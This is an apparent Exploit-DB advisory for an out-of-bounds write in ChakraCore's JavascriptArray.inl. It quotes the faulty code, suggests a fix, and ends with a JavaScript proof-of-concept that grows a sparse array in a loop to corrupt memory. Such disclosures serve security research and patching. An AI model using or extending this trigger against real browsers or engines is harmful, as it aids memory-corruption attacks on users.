Out-of-bounds write in JavascriptArray.inl

vendor:

N/A

by:

John Doe

9.8

CVSS

HIGH

Out-of-bounds write

787

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

Out-of-bounds write in JavascriptArray.inl

In the 'ScanForMissingValues' method, it uses 'head'. But it doesn't check the grown segment 'current' is equal to 'head' before calling the method. This can lead to an out-of-bounds write vulnerability.

Mitigation:

Check the grown segment 'current' is equal to 'head' before calling the method.

Source

Exploit-DB raw data:

/*
Here's a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl.

growby = endSeg->length;
current = current->GrowByMin(recycler, growby);
CopyArray(current->elements + endIndex + 1, endSeg->length,
    ((Js::SparseArraySegment<T>*)endSeg)->elements, endSeg->length);
LinkSegments((Js::SparseArraySegment<T>*)startPrev, current);
if (HasNoMissingValues())
{
    if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}

In the "ScanForMissingValues" method, it uses "head". But it doesn't check the grown segment "current" is equal to "head" before calling the method.
I guess it shoud be like:
if (current == head && HasNoMissingValues())
{
    if (ScanForMissingValues<T>(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}
*/

function trigger() {
    let arr = [1.1];
    let i = 0;
    for (; i < 1000; i += 0.5) {
        arr[i + 0x7777] = 2.0;
    }

    arr[1001] = 35480.0;

    for (; i < 0x7777; i++) {
        arr[i] = 1234.3;
    }
}

for (let i = 0; i < 100; i++) {
    trigger();
}